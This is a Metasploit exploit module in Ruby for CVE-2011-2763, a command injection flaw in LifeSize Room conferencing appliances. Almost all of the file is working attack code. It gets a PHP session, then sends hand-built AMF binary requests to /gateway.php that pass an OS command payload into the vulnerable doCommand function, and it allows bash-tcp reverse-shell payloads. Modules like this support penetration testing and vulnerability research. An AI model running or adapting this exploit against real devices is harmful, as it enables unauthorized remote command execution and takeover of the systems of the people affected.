LifeSize Room Command Injection

##
# $Id: lifesize_room.rb 14143 2011-11-02 19:40:05Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking

 include Msf::Exploit::Remote::HttpClient

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'LifeSize Room Command Injection',
   'Description'    => %q{
     This module exploits a vulnerable resource in LifeSize
    Room  versions 3.5.3 and 4.7.18 to inject OS commmands.  LifeSize
    Room is an appliance and thus the environment is limited
    resulting in a small set of payload options.
   },
   'Author' =>
    [
     # SecureState R&D Team - Special Thanks To Chris Murrey
     'Spencer McIntyre',
    ],
   'License'        => MSF_LICENSE,
   'Version'        => '$Revision: 14143 $',
   'References'     =>
    [
     [ 'CVE', '2011-2763' ],
    ],
   'Privileged'     => false,
   'Payload'        =>
    {
     'DisableNops' => true,
     'Space'       => 65535, # limited by the two byte size in the AMF encoding
     'Compat'      =>
      {
       'PayloadType' => 'cmd cmd_bash',
       'RequiredCmd' => 'generic bash-tcp',
      }
    },
   'Platform'       => [ 'unix' ],
   'Arch'           => ARCH_CMD,
   'Targets'        => [ [ 'Automatic', { } ] ],
   'DisclosureDate' => 'Jul 13 2011',
   'DefaultTarget'  => 0))
 end

 def exploit
  print_status("Requesting PHP Session...")
  res = send_request_cgi({
   'encode'    => false,
   'uri'       => "/interface/interface.php?uniqueKey=#{rand_text_numeric(13)}",
   'method'    => 'GET',
  }, 10)

  if not res.headers['set-cookie']
   print_error('Could Not Obtain A Session ID')
   return
  end

  sessionid = 'PHPSESSID=' << res.headers['set-cookie'].split('PHPSESSID=')[1].split('; ')[0]

  headers = {
   'Cookie'        => sessionid,
   'Content-Type'  => 'application/x-amf',
  }

  print_status("Validating PHP Session...")

  data  = "\x00\x00\x00\x00\x00\x02\x00\x1b"
  data << "LSRoom_Remoting.amfphpLogin"
  data << "\x00\x02/1\x00\x00\x00"
  data << "\x05\x0a\x00\x00\x00\x00\x00\x17"
  data << "LSRoom_Remoting.getHost"
  data << "\x00\x02\x2f\x32\x00\x00\x00\x05\x0a\x00\x00\x00\x00"

  res = send_request_cgi({
    'encode'    => false,
    'uri'       => '/gateway.php',
    'data'      => data,
    'method'    => 'POST',
    'headers'   => headers,
  }, 10)

  if not res
   print_error('Could Not Validate The Session ID')
   return
  end

  print_status("Sending Malicious POST Request...")

  # This is the amf data for the request to the vulnerable function LSRoom_Remoting.doCommand
  amf_data =  "\x00\x00\x00\x00\x00\x01\x00\x19"
  amf_data << "LSRoom_Remoting.doCommand"
  amf_data << "\x00\x02\x2f\x37\xff\xff\xff\xff"
  amf_data << "\x0a\x00\x00\x00\x02\x02#{[payload.encoded.length].pack('n')}#{payload.encoded}"
  amf_data << "\x02\x00\x0dupgradeStatus"

  res = send_request_cgi({
    'encode'    => false,
    'uri'       => '/gateway.php?' << sessionid,
    'data'      => amf_data,
    'method'    => 'POST',
    'headers'   => headers
  }, 10)
 end

end